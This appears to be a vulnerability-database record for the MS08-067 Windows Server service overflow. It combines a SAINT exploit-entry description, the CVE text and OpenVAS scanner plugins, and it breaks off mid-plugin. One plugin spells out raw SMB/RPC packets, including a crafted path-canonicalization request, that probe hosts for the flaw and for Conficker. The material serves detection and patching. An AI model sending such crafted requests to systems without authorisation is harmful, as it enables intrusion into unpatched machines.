The Windows Server service supports file, print, and named-pipe sharing over the network.
Problem
A buffer overflow vulnerability allows remote attackers to execute arbitrary commands by sending a specially crafted RPC request to the Windows Server service.
Due to the nature of this vulnerability, the success of the exploit depends on the contents of unused stack memory space, and therefore is not completely reliable.
Platforms
Windows XP SP3 / Windows XP
Windows XP SP2
Windows XP SP1 / Windows XP
Windows Server 2003
Windows Server 2003 SP1
Windows Server 2003 SP2
{"type": "saint", "edition": 2, "title": "Windows Server Service buffer overflow MS08-067", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "e5deb67982bc3515b16244a42ef0e31b"}, {"key": "cvss", "hash": "edfca85c4c320ffaa9dcfdcb6a20ce1d"}, {"key": "description", "hash": "28495ca199fc5895457886f7d952b69d"}, {"key": "href", "hash": "b1ca5654897bb6f245bace3832f42303"}, {"key": "modified", "hash": "9c7ff2bc275052ff2ee7d2ba964ccc9d"}, {"key": "published", "hash": "9c7ff2bc275052ff2ee7d2ba964ccc9d"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "a2e6da74c8b179f121f93bda28c97a91"}, {"key": "title", "hash": "a0a506981b214dc8afd6ec5a72440955"}, {"key": "type", "hash": "2a4c1f6b0cd88cf3fac4b56bd4283522"}], "references": [], "objectVersion": "1.3", "published": "2008-10-24T00:00:00", "lastseen": "2019-05-29T17:19:46", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2008-4250"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Added: 10/24/2008 \nCVE: [CVE-2008-4250](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250>) \nBID: [31874](<http://www.securityfocus.com/bid/31874>) \nOSVDB: [49243](<http://www.osvdb.org/49243>) \n\n\n### Background\n\nThe Windows Server service supports file, print, and named-pipe sharing over the network. \n\n### Problem\n\nA buffer overflow vulnerability allows remote attackers to execute arbitrary commands by sending a specially crafted RPC request to the Windows Server service. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 08-067](<http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx>). \n\n### References\n\n<http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx> \n\n\n### Limitations\n\nDue to the nature of this vulnerability, the success of the exploit depends on the contents of unused stack memory space, and therefore is not completely reliable. \n\n### Platforms\n\nWindows XP SP3 / Windows XP \nWindows XP SP2 \nWindows XP SP1 / Windows XP \nWindows Server 2003 \nWindows Server 2003 SP1 \nWindows Server 2003 SP2 \n \n\n", "edition": 1, "enchantments": {"dependencies": {"modified": "2016-12-14T16:58:03", "references": [{"idList": ["WIN_SERVER_2008_NTLM_PCI.NASL", "SMB_KB958644.NASL", "SMB_NT_MS08-067.NASL"], "type": "nessus"}, {"idList": ["1337DAY-ID-25383"], "type": "zdt"}, {"idList": ["TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"], "type": "trendmicroblog"}, {"idList": ["CVE-2008-4250"], "type": "cve"}, {"idList": ["OPENVAS:900056", "OPENVAS:1361412562310900056", "OPENVAS:900091", "OPENVAS:900055", "OPENVAS:1361412562310900091", "OPENVAS:1361412562310900055", "OPENVAS:1361412562310801287", "OPENVAS:1361412562310803571"], "type": "openvas"}, {"idList": ["MS08_067"], "type": "canvas"}, {"idList": ["VU:827267"], "type": "cert"}, {"idList": ["SSV:88222", "SSV:4288"], "type": "seebug"}, {"idList": ["NMAP:SMB-VULN-MS08-067.NSE"], "type": "nmap"}, {"idList": ["SAINT:AC0D0F2C31B3A560B890C66CD6245812", "SAINT:03200E9666F9133B812B3104462F5E6E"], "type": "saint"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS08_067_NETAPI"], "type": "metasploit"}, {"idList": ["EDB-ID:7132", "EDB-ID:7104", "EDB-ID:16362", "EDB-ID:40279", "EDB-ID:6841", "EDB-ID:6824"], "type": "exploitdb"}, {"idList": ["SECURITYVULNS:DOC:20745", "SECURITYVULNS:VULN:9380", "SECURITYVULNS:DOC:20744"], "type": "securityvulns"}, {"idList": ["HUAWEI-SA-20171129-01-WINDOWS"], "type": "huawei"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "hash": "8098a2a5caa46957569791555ec1cfefecb82303a20df9b6c1d39c2642e29617", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "e5deb67982bc3515b16244a42ef0e31b", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "9c7ff2bc275052ff2ee7d2ba964ccc9d", "key": "published"}, {"hash": "28495ca199fc5895457886f7d952b69d", "key": "description"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "a2e6da74c8b179f121f93bda28c97a91", "key": "reporter"}, {"hash": "a0a506981b214dc8afd6ec5a72440955", "key": "title"}, {"hash": "2a4c1f6b0cd88cf3fac4b56bd4283522", "key": "type"}, {"hash": "9c7ff2bc275052ff2ee7d2ba964ccc9d", "key": "modified"}, {"hash": "b1ca5654897bb6f245bace3832f42303", "key": "href"}], "history": [], "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/windows_server_service_ms08067", "id": "SAINT:B1CA5654897BB6F245BACE3832F42303", "lastseen": "2016-12-14T16:58:03", "modified": "2008-10-24T00:00:00", "objectVersion": "1.2", "published": "2008-10-24T00:00:00", "references": [], "reporter": "SAINT Corporation", "title": "Windows Server Service buffer overflow MS08-067", "type": "saint", "viewCount": 4}, "differentElements": ["cvss"], "edition": 1, "lastseen": "2016-12-14T16:58:03"}], "description": "Added: 10/24/2008 \nCVE: [CVE-2008-4250](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250>) \nBID: [31874](<http://www.securityfocus.com/bid/31874>) \nOSVDB: [49243](<http://www.osvdb.org/49243>) \n\n\n### Background\n\nThe Windows Server service supports file, print, and named-pipe sharing over the network. \n\n### Problem\n\nA buffer overflow vulnerability allows remote attackers to execute arbitrary commands by sending a specially crafted RPC request to the Windows Server service. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 08-067](<http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx>). \n\n### References\n\n<http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx> \n\n\n### Limitations\n\nDue to the nature of this vulnerability, the success of the exploit depends on the contents of unused stack memory space, and therefore is not completely reliable. \n\n### Platforms\n\nWindows XP SP3 / Windows XP \nWindows XP SP2 \nWindows XP SP1 / Windows XP \nWindows Server 2003 \nWindows Server 2003 SP1 \nWindows Server 2003 SP2 \n \n\n", "reporter": "SAINT Corporation", "hash": "8f530b4d6214507ddb7d7599ad171bcaa2d297b3a91bd5c0edba16604a4492dd", "viewCount": 7, "modified": "2008-10-24T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/windows_server_service_ms08067", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-4250"]}, {"type": "exploitdb", "idList": ["EDB-ID:6824", "EDB-ID:7104", "EDB-ID:7132", "EDB-ID:16362", "EDB-ID:40279", "EDB-ID:6841"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20171129-01-WINDOWS"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:20745", "SECURITYVULNS:DOC:20744", "SECURITYVULNS:VULN:9380"]}, {"type": "zdt", "idList": ["1337DAY-ID-25383"]}, {"type": "saint", "idList": ["SAINT:AC0D0F2C31B3A560B890C66CD6245812", "SAINT:03200E9666F9133B812B3104462F5E6E"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310900056", "OPENVAS:900055", "OPENVAS:1361412562310900091", "OPENVAS:900056", "OPENVAS:1361412562310900055", "OPENVAS:900091", "OPENVAS:1361412562310801287", "OPENVAS:1361412562310803571"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS08-067.NSE"]}, {"type": "mskb", "idList": ["KB958644"]}, {"type": "canvas", "idList": ["MS08_067"]}, {"type": "nessus", "idList": ["SMB_NT_MS08-067.NASL", "SMB_KB958644.NASL", "WIN_SERVER_2008_NTLM_PCI.NASL"]}, {"type": "seebug", "idList": ["SSV:4288", "SSV:88222"]}, {"type": "cert", "idList": ["VU:827267"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS08_067_NETAPI"]}, {"type": "ics", "idList": ["ICSMA-17-215-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"]}], "modified": "2019-05-29T17:19:46"}, "score": {"value": 10.3, "vector": "NONE", "modified": "2019-05-29T17:19:46"}, "vulnersScore": 10.3}, "cvelist": ["CVE-2008-4250"], "id": "SAINT:B1CA5654897BB6F245BACE3832F42303", "bulletinFamily": "exploit", "scheme": null}
{"cve": [{"lastseen": "2019-05-29T18:09:28", "bulletinFamily": "NVD", "description": "The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary code via a crafted RPC request that triggers the overflow during path canonicalization, as exploited in the wild by Gimmiv.A in October 2008, aka \"Server Service Vulnerability.\"", "modified": "2019-02-26T14:04:00", "id": "CVE-2008-4250", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4250", "published": "2008-10-23T22:00:00", "title": "CVE-2008-4250", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:40:24", "bulletinFamily": "scanner", "description": "This host seems to be contaminated with infectious Conficker Worm.", "modified": "2019-05-03T00:00:00", "published": "2009-04-17T00:00:00", "id": "OPENVAS:1361412562310900091", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900091", "title": "Conficker Detection", "type": "openvas", "sourceData": "############################################################################\n# OpenVAS Vulnerability Test\n#\n# Conficker Detection\n#\n# Authors:\n# Chandan S <schandan@secpod.com>\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\n#############################################################################\n# Based on the work of Tim Brown <timb@nth-dimension.org.uk> as published\n# here, http://www.nth-dimension.org.uk/blog.php?id=72 along with the\n# associated NASL from SecPod\n#\n# Updated SRVSVC and ntrPathCanonicalize Request Packets with Description.\n# - By Chandan S\n#############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900091\");\n script_version(\"2019-05-03T08:55:39+0000\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 08:55:39 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2009-04-17 13:24:25 +0200 (Fri, 17 Apr 2009)\");\n script_bugtraq_id(31874);\n script_cve_id(\"CVE-2008-4250\");\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_category(ACT_ATTACK);\n script_family(\"Malware\");\n script_name(\"Conficker Detection\");\n script_dependencies(\"nmap_nse/gb_nmap_p2p_conficker.nasl\", \"nmap_nse/gb_nmap_smb_check_vulns.nasl\",\n \"os_detection.nasl\", \"smb_nativelanman.nasl\", \"netbios_name_get.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"Host/runs_windows\");\n script_exclude_keys(\"SMB/samba\");\n\n script_xref(name:\"URL\", value:\"http://www.dshield.org/diary.html?storyid=5860\");\n script_xref(name:\"URL\", value:\"http://www.anti-spyware-101.com/remove-conficker\");\n script_xref(name:\"URL\", value:\"http://iv.cs.uni-bonn.de/wg/cs/applications/containing-conficker/\");\n script_xref(name:\"URL\", value:\"http://www.microsoft.com/technet/security/bulletin/ms08-067.mspx\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow remote attackers to take complete\n control of an affected system and capable of stealing all kind of sensitive information and can even\n spread across the Network.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 2K Service Pack 4 and prior.\n\n Microsoft Windows XP Service Pack 3 and prior.\n\n Microsoft Windows 2003 Service Pack 2 and prior.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\n\n Additionally use a Conficker Removal Tool, or a known Security Product to remove the conficker worm.\");\n\n script_tag(name:\"summary\", value:\"This host seems to be contaminated with infectious Conficker Worm.\");\n\n script_tag(name:\"insight\", value:\"Conficker is a worm that spreads on Windows Platforms. This malware could\n spread Windows file shares protected with weak passwords or to which a logged on domain administrator has\n access, by copying itself to removable storage devices and by exploiting the MS08-067 Windows Server service\n vulnerability.\n\n This malware generates infections files to set up to run as a service and also using a random name when Windows\n starts under system32, and tries to modify permissions on the service registry entries so that they are not\n visible to the user. Such registry entries are under,\n\n 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost' and\n\n 'HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\RANDOM_SERVICE_NAME'\n\n The plugin determines Conficker variants B or C. It likely works against systems that allow anonymous login,\n otherwise Credentials can be supplied.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"Mitigation\");\n\n script_xref(name:\"URL\", value:\"http://www.microsoft.com/technet/security/bulletin/ms08-067.mspx\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\n\nif( kb_smb_is_samba() ) exit( 0 );\n\n# First of all check whether nmap already detected an infection.\nres = get_kb_list(\"conficker/nse\");\nif (!isnull(res)) {\n report = 'Nmap (http://nmap.org) has detected a possible infection:\\n';\n\n foreach msg (res) {\n report += msg + '\\n';\n }\n security_message(port:0, data:report);\n exit(0);\n}\n\nname = kb_smb_name();\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\nport = kb_smb_transport();\n\nsoc = open_sock_tcp(port);\nif(!soc){\n exit(0);\n}\n\nr = smb_session_request(soc:soc, remote:name);\nif(!r) { close(soc); exit(0); }\n\nif(!domain){\n domain = \"\";\n}\n\nif(!login && !pass)\n{\n login = \"\";\n pass = \"\";\n prot = smb_neg_prot_anonymous(soc:soc);\n}\n\nelse {\n prot = smb_neg_prot(soc:soc);\n}\n\nif(!prot)\n{\n close(soc);\n exit(0);\n}\n\n##Validate length of response\nif(strlen(prot) < 5 ) {\n exit(0);\n}\n\n##Currently Only SMB1 is supported, For SMB2 ord(prot[4]) == 254\nif(ord(prot[4]) == 254)\n{\n ##Close current Socket\n close(soc);\n ## Open a new Socket\n soc = open_sock_tcp(port);\n if(!soc){\n exit(0);\n }\n\n ##Session Request\n r = smb_session_request(soc:soc, remote:name);\n if(!r) { close(soc); exit(0); }\n\n prot = smb_neg_prot_NTLMv1(soc:soc);\n if(!prot)\n {\n close(soc);\n exit(0);\n }\n}\n\nr = smb_session_setup(soc:soc, login:login, password:pass, domain:domain, prot:prot);\nif(!r)\n{\n close(soc);\n report = string(\"MS08-067: Failed to perform Clear Text based authentication.\");\n exit(0);\n}\n\nuid = session_extract_uid(reply:r);\nif(!uid)\n{\n close(soc);\n exit(0);\n}\n\nr = smb_tconx(soc:soc, uid:uid, share:\"IPC$\", name:name);\nif(!r)\n{\n close(soc);\n exit(0);\n}\n\ntid = tconx_extract_tid(reply:r);\nif(!tid)\n{\n close(soc);\n exit(0);\n}\n\ntid_high = tid / 256;\ntid_low = tid % 256;\nuid_high = uid / 256;\nuid_low = uid % 256;\n\n# \\srvsvc Request\nreq = raw_string(0xff, 0x53, 0x4d, 0x42, 0xa2, 0x00, 0x00, 0x00, 0x00, 0x18,\n 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, tid_low, tid_high, 0xea, 0x16,\n uid_low, uid_high, 0x00, 0x00, 0x18, 0xff, 0x00, 0x00, 0x00,\n 0x00, 0x08, 0x00, 0x16, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x9f, 0x01, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00,\n 0x00, 0x01, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x02,\n 0x00, 0x00, 0x00, 0x03, 0x09, 0x00, 0x5c, 0x62, 0x72, 0x6f,\n 0x77, 0x73, 0x65, 0x72, 0x00);\n\nreq = raw_string(0x00, 0x00, 0x00, (strlen(req)%256)) + req;\nsend(socket:soc, data:req);\nresp = smb_recv(socket:soc);\nif(strlen(resp) < 139)\n{\n close(soc);\n exit(0);\n}\n\nfid_low = ord(resp[42]);\nfid_high = ord(resp[43]);\n\n# srvsvc Bind Request\nreq = raw_string(0xff, 0x53, 0x4d, 0x42, 0x25, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, tid_low, tid_high, 0xea, 0x16,\n uid_low, uid_high, 0x00, 0x00, 0x10, 0x00, 0x00, 0x48, 0x00,\n 0x00, 0x04, 0xe0, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4a, 0x00, 0x48, 0x00,\n 0x4a, 0x00, 0x02, 0x00, 0x26, 0x00, fid_low, fid_high, 0x4f, 0x00,\n 0x5c, 0x50, 0x49, 0x50, 0x45, 0x5c, 0x00, 0x05, 0x00, 0x0b,\n 0x03, 0x10, 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x01,\n 0x00, 0x00, 0x00, 0xb8, 0x10, 0xb8, 0x10, 0x00, 0x00, 0x00,\n 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0xc8,\n 0x4f, 0x32, 0x4b, 0x70, 0x16, 0xd3, 0x01, 0x12, 0x78, 0x5a,\n 0x47, 0xbf, 0x6e, 0xe1, 0x88, 0x03, 0x00, 0x00, 0x00, 0x04,\n 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08,\n 0x00, 0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00);\n\nreq = raw_string(0x00, 0x00, 0x00, (strlen(req)%256)) + req;\nsend(socket:soc, data:req);\nsmb_recv(socket:soc);\n\n# ntrPathCanonicalize Request (With Malicious Code)\nreq = raw_string(\n0xff, 0x53, 0x4d, 0x42, 0x25, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\ntid_low, tid_high,\n0xea, 0x16,\nuid_low, uid_high,\n0x00, 0x00, 0x10, 0x00, 0x00, 0x60, 0x00, 0x00, 0x04, 0xe0, 0xff, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4a, 0x00, 0x60,\n0x00, 0x4a, 0x00, 0x02, 0x00, 0x26, 0x00, fid_low, fid_high, 0x67, 0x00, 0x5c, 0x50,\n0x49, 0x50, 0x45, 0x5c, 0x00, 0x05, 0x00, 0x00, 0x03, 0x10, 0x00, 0x00, 0x00,\n0x60, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x1f, 0x00, 0x01, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x61, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x5c, 0x00, 0x2e, 0x00,\n0x2e, 0x00, 0x5c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x02,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x5c, 0x00,\n0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00);\n\nreq = raw_string(0x00, 0x00, 0x00, 0xaa) + req;\n\nsend(socket:soc, data:req);\nresp = smb_recv(socket:soc);\nclose(soc);\n\nif(strlen(resp) < 100){\n exit(0);\n}\n\nif(ord(resp[96]) == 87 && ord(resp[97]) == 00 && ord(resp[98]) == 00 && ord(resp[99]) == 00)\n{\n security_message(port:0);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-02T21:10:12", "bulletinFamily": "scanner", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS08-067.", "modified": "2017-02-18T00:00:00", "published": "2008-10-24T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=900055", "id": "OPENVAS:900055", "title": "Server Service Could Allow Remote Code Execution Vulnerability (958644)", "type": "openvas", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms08-067_900055.nasl 5344 2017-02-18 17:43:17Z cfi $\n# Description: Server Service Could Allow Remote Code Execution Vulnerability (958644)\n#\n# Authors:\n# Chandan S <schandan@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2008 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n##############################################################################\n\ntag_impact = \"Successful exploitation could allow remote attackers to take\n complete control of an affected system.\n Impact Level: System\n\n Variants of Conficker worm are based on the above described vulnerability. \n More details regarding the worm and means to resolve this can be found at,\n http://technet.microsoft.com/en-us/security/dd452420.aspx\";\n\ntag_affected = \"Microsoft Windows 2K Service Pack 4 and prior.\n Microsoft Windows XP Service Pack 3 and prior.\n Microsoft Windows 2003 Service Pack 2 and prior.\n Microsoft Windows Vista Service Pack 1 and prior.\n Microsoft Windows 2008 Service Pack 1 and prior.\";\ntag_insight = \"Flaw is due to an error in the Server Service, that does not properly\n handle specially crafted RPC requests.\";\ntag_solution = \"Run Windows Update and update the listed hotfixes or download\n and update mentioned hotfixes in the advisory from the below link,\n http://www.microsoft.com/technet/security/bulletin/ms08-067.mspx\";\ntag_summary = \"This host is missing a critical security update according to\n Microsoft Bulletin MS08-067.\";\n\n\nif(description)\n{\n script_id(900055);\n script_version(\"$Revision: 5344 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-18 18:43:17 +0100 (Sat, 18 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-10-24 09:48:39 +0200 (Fri, 24 Oct 2008)\");\n script_bugtraq_id(31874);\n script_cve_id(\"CVE-2008-4250\");\n script_copyright(\"Copyright (C) 2008 SecPod\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Windows : Microsoft Bulletins\");\n script_name(\"Server Service Could Allow Remote Code Execution Vulnerability (958644)\");\n\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://www.microsoft.com/technet/security/bulletin/ms08-067.mspx\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2k:5, xp:4, win2003:3, winVista:3, win2008:3) <= 0){\n exit(0);\n}\n\n# Check Hotfix Missing 958644 (MS08-067)\nif(hotfix_missing(name:\"958644\") == 0){\n exit(0);\n}\n\nsysPath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\COM3\\Setup\",\n item:\"Install Path\");\nif(!sysPath){\n exit(0);\n}\n\nshare = ereg_replace(pattern:\"([A-Z]):.*\", replace:\"\\1$\", string:sysPath);\nfile = ereg_replace(pattern:\"[A-Z]:(.*)\", replace:\"\\1\",\n string:sysPath + \"\\Netapi32.dll\");\n\ndllVer = GetVer(file:file, share:share);\nif(!dllVer){\n exit(0);\n}\n\n# Windows 2K\nif(hotfix_check_sp(win2k:5) > 0)\n{\n # Grep for Srv.sys version < 5.0.2195.7203\n if(egrep(pattern:\"^5\\.0\\.2195\\.([0-6]?[0-9]?[0-9]?[0-9]|7([01][0-9][0-9]|\" +\n \"20[0-2]))$\", string:dllVer)){\n security_message(0);\n }\n exit(0);\n}\n\n# Windows XP\nif(hotfix_check_sp(xp:4) > 0)\n{\n SP = get_kb_item(\"SMB/WinXP/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n # Grep for Srv.sys < 5.1.2600.3462\n if(egrep(pattern:\"^5\\.1\\.2600\\.([0-2]?[0-9]?[0-9]?[0-9]|3([0-3][0-9][0-9]|\" +\n \"4([0-5][0-9]|6[01])))$\", string:dllVer)){\n security_message(0);\n }\n exit(0);\n }\n else if(\"Service Pack 3\" >< SP)\n {\n # Grep for Srv.sys < 5.1.2600.5694\n if(egrep(pattern:\"^5\\.1\\.2600\\.([0-4]?[0-9]?[0-9]?[0-9]|5([0-5][0-9][0-9]|\" +\n \"6([0-8][0-9]|9[0-3])))$\", string:dllVer)){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n# Windows 2003\nif(hotfix_check_sp(win2003:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2003/ServicePack\");\n if(\"Service Pack 1\" >< SP)\n {\n # Grep for Srv.sys version < 5.2.3790.3229\n if(egrep(pattern:\"^5\\.2\\.3790\\.([0-2]?[0-9]?[0-9]?[0-9]|3[01][0-9][0-9]|\" +\n \"32([01][0-9]|2[0-8]))$\",\n string:dllVer)){\n security_message(0);\n }\n exit(0);\n }\n else if(\"Service Pack 2\" >< SP)\n {\n # Grep for Srv.sys version < 5.2.3790.4392\n if(egrep(pattern:\"^5\\.2\\.3790\\.([0-3]?[0-9]?[0-9]?[0-9]|4([0-2][0-9][0-9]|\" +\n \"3([0-8][0-9]|9[01])))$\", string:dllVer)){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n## Get System32 path\nsysPath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\",\n item:\"PathName\");\nif(!sysPath){\n exit(0);\n}\n\nsysVer = fetch_file_version(sysPath, file_name:\"system32\\Netapi32.dll\");\nif(sysVer)\n{\n # Windows Vista\n if(hotfix_check_sp(winVista:2) > 0)\n {\n SP = get_kb_item(\"SMB/WinVista/ServicePack\");\n if(\"Service Pack 1\" >< SP)\n {\n # Grep for Netapi32.dll version < 6.0.6001.18157\n if(version_is_less(version:sysVer, test_version:\"6.0.6001.18157\")){\n security_message(0);\n }\n exit(0);\n }\n }\n\n # Windows Server 2008\n else if(hotfix_check_sp(win2008:2) > 0)\n {\n SP = get_kb_item(\"SMB/Win2008/ServicePack\");\n if(\"Service Pack 1\" >< SP)\n {\n # Grep for Netapi32.dll version < 6.0.6001.18157\n if(version_is_less(version:sysVer, test_version:\"6.0.6001.18157\")){\n security_message(0);\n }\n exit(0);\n }\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-25T14:35:23", "bulletinFamily": "scanner", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS08-067.", "modified": "2017-10-24T00:00:00", "published": "2008-10-30T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=900056", "id": "OPENVAS:900056", "title": "Vulnerability in Server Service Could Allow Remote Code Execution (958644)", "type": "openvas", "sourceData": "#############################################################################\n# Based on the work of Tim Brown <timb@nth-dimension.org.uk> as published\n# here, http://www.nth-dimension.org.uk/blog.php?id=72\n############################################################################\n\ntag_impact = \"Successful exploitation could allow remote attackers to take\n complete control of an affected system.\n Impact Level: System\n\n Variants of Conficker worm 